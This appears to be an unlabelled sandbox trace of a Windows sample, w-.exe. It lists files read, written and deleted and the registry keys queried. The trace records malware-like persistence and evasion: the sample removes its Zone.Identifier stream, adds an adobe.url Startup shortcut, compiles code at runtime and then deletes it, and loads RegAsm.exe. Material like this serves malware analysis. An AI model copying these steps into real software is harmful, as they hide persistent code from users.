C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\lnkM90SqGDwc1s67.enc\*
C:\Users\Seven01\AppData\Local\Temp\w-.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.tmp
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.0.cs
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.dll
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.out
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.err
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\w-.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Users\Seven01\w-.exe
C:\Users\Seven01\w-.exe:Zone.Identifier
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.url
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC633E98F8A59A4144B27AE67E177ABC61.TMP
C:\Users\Seven01\AppData\Local\Temp\RES2D64.tmp
C:\Windows\System32\tzres.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.INI
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\Globalization\en.nlp
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
\Device\Http\Communication
C:\Windows\System32\p2pcollab.dll
C:\Windows\System32\qagentrt.dll
C:\Windows\System32\dnsapi.dll
C:\Windows\System32\DHCPQEC.DLL
C:\Windows\System32\napipsec.dll
C:\Windows\System32\it-IT\napipsec.dll.mui
C:\Windows\System32\tsgqec.dll
C:\Windows\System32\EAPQEC.DLL
C:\Windows\System32\it-IT\eapqec.dll.mui
C:\Windows\SysWOW64\it-IT\P2PNETSH.DLL.mui

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\w-.exe.config
C:\Users\Seven01\AppData\Local\Temp\w-.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.dll
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC633E98F8A59A4144B27AE67E177ABC61.TMP
C:\Users\Seven01\AppData\Local\Temp\RES2D64.tmp
C:\Windows\System32\tzres.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
\Device\Http\Communication
C:\Windows\System32\DHCPQEC.DLL
C:\Windows\System32\napipsec.dll
C:\Windows\System32\it-IT\napipsec.dll.mui
C:\Windows\System32\tsgqec.dll
C:\Windows\System32\EAPQEC.DLL
C:\Windows\System32\it-IT\eapqec.dll.mui
C:\Windows\SysWOW64\it-IT\P2PNETSH.DLL.mui

Write Files

C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.tmp
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.0.cs
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.dll
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.cmdline
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.out
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.err
C:\Users\Seven01\w-.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.url
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC633E98F8A59A4144B27AE67E177ABC61.TMP
C:\Users\Seven01\AppData\Local\Temp\RES2D64.tmp
\Device\Http\Communication

Delete Files

C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.cmdline
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.0.cs
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.tmp
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.out
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.dll
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.pdb
C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.err
C:\Users\Seven01\w-.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RES2D64.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC633E98F8A59A4144B27AE67E177ABC61.TMP

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\w-.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
